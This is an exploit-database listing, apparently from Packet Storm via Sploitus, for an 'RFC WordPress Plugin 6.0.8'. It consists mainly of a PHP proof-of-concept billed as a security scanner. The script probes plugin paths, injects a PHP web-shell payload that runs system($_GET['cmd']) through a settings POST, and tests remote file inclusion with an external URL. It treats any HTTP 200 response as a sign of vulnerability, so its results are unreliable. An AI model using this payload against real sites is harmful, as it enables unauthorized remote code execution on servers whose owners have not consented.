Share
## https://sploitus.com/exploit?id=PACKETSTORM:216298
=============================================================================================================================================
    | # Title     : WordPress RFC Plugin 6.0.8 Security Scanner                                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/plugins/                                                                                              |
    =============================================================================================================================================
    
    POC : 
    
    [+] References : https://packetstorm.news/files/id/179099/
    
    
    [+] Summary : 
                  The RFC WordPress Plugin version 6.0.8 contains critical security vulnerabilities that allow unauthenticated attackers to execute arbitrary code and include remote files on the target system.
    
    [+] POC :  
    
    php poc.php
    
    <?php
    
    class WordPressExploitTester {
        private $target;
        private $user_agent;
        
        public function __construct($target_url) {
            $this->target = rtrim($target_url, '/');
            $this->user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
        }
        
        public function test_plugin_existence() {
            $common_paths = [
                '/wp-content/plugins/rfc-wordpress/rfc.php',
                '/wp-content/plugins/rfc/rfc.php',
                '/wp-content/plugins/rfc-wordpress-plugin/rfc.php',
                '/wp-content/plugins/rfc-wp/rfc.php'
            ];
            
            echo "Testing plugin existence...\n";
            
            foreach ($common_paths as $path) {
                $url = $this->target . $path;
                $exists = $this->check_url_exists($url);
                
                if ($exists) {
                    echo "✓ Plugin found: $url\n";
                    return $path;
                } else {
                    echo "✗ Not found: $path\n";
                }
            }
            
            return false;
        }
        
        public function test_rce_vulnerability($plugin_path = null) {
            if (!$plugin_path) {
                $plugin_path = '/wp-content/plugins/rfc-wordpress/rfc.php';
            }
            
            $url = $this->target . $plugin_path;
            $payload = "<?php system(\$_GET['cmd']); ?>";
            
            $post_data = array(
                'rfc_action' => 'save_settings',
                'rfc_settings' => $payload
            );
            
            echo "Testing RCE at: $url\n";
            return $this->send_post_request($url, $post_data, "RCE");
        }
        
        public function test_rfi_vulnerability($plugin_path = null) {
            if (!$plugin_path) {
                $plugin_path = '/wp-content/plugins/rfc-wordpress/rfc.php';
            }
            
            $url = $this->target . $plugin_path . '?rfc_action=save_settings';
            $payload = "http://example.com/test.txt";
            
            $post_data = array(
                'rfc_settings' => $payload
            );
            
            echo "Testing RFI at: $url\n";
            return $this->send_post_request($url, $post_data, "RFI");
        }
        
        private function check_url_exists($url) {
            $ch = curl_init();
            
            curl_setopt_array($ch, array(
                CURLOPT_URL => $url,
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_NOBODY => true, // HEAD request فقط
                CURLOPT_TIMEOUT => 5,
                CURLOPT_USERAGENT => $this->user_agent,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_SSL_VERIFYPEER => false
            ));
            
            curl_exec($ch);
            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            
            return ($http_code == 200);
        }
        
        private function send_post_request($url, $data, $exploit_type) {
            $ch = curl_init();
            
            curl_setopt_array($ch, array(
                CURLOPT_URL => $url,
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => http_build_query($data),
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_TIMEOUT => 10,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_USERAGENT => $this->user_agent,
                CURLOPT_HEADER => true // للحصول على ال headers
            ));
            
            $response = curl_exec($ch);
            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            $error = curl_error($ch);
            
            curl_close($ch);
            
            echo "HTTP Response Code: $http_code\n";
            
            if ($error) {
                return "❌ Error in $exploit_type: " . $error . "\n";
            }
            
            if ($http_code == 200) {
                return "✅ $exploit_type test completed - Potential vulnerability detected (HTTP 200)\n";
            } elseif ($http_code == 404) {
                return "❌ $exploit_type test failed - Plugin not found (404)\n";
            } elseif ($http_code == 403) {
                return "❌ $exploit_type test failed - Access forbidden (403)\n";
            } else {
                return "⚠️ $exploit_type test - HTTP Code: $http_code (May require further analysis)\n";
            }
        }
        
        public function full_scan() {
            echo "=== WordPress RFC Plugin Security Scanner ===\n";
            echo "Target: " . $this->target . "\n\n";
            
            // الخطوة 1: البحث عن المسار الصحيح
            $plugin_path = $this->test_plugin_existence();
            
            if (!$plugin_path) {
                echo "\n❌ RFC WordPress plugin not found on target.\n";
                echo "Possible reasons:\n";
                echo "- Plugin not installed\n";
                echo "- Different plugin name/path\n";
                echo "- Target is not WordPress\n";
                echo "- Access restrictions\n";
                return;
            }
            
            echo "\n✅ Plugin found! Starting vulnerability tests...\n\n";
            
            // الخطوة 2: اختبار الثغرات
            $result1 = $this->test_rce_vulnerability($plugin_path);
            echo $result1 . "\n";
            
            $result2 = $this->test_rfi_vulnerability($plugin_path);
            echo $result2 . "\n";
            
            echo "\n=== Scan Complete ===\n";
        }
    }
    
    // الاستخدام
    if ($argc > 1) {
        $target = $argv[1];
    } else {
        $target = "https://target.com"; // غير هذا بالهدف الحقيقي
    }
    
    echo "WordPress RFC Plugin Security Scanner\n";
    echo "=====================================\n\n";
    
    $tester = new WordPressExploitTester($target);
    $tester->full_scan();
    
    // استخدام بديل إذا أردت اختبار موقع محلي
    class LocalTest {
        public static function test_local_setup() {
            echo "\n=== Local Test Mode ===\n";
            
            $test_urls = [
                'http://localhost/wordpress',
                'http://127.0.0.1/wordpress', 
                'http://localhost:8080',
                'http://test.local'
            ];
            
            foreach ($test_urls as $test_url) {
                echo "Testing: $test_url\n";
                $tester = new WordPressExploitTester($test_url);
                $tester->test_plugin_existence();
                echo "---\n";
            }
        }
    }
    
    // لتفعيل الاختبار المحلي، أزل التعليق من السطر التالي:
    // LocalTest::test_local_setup();
    
    ?>
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================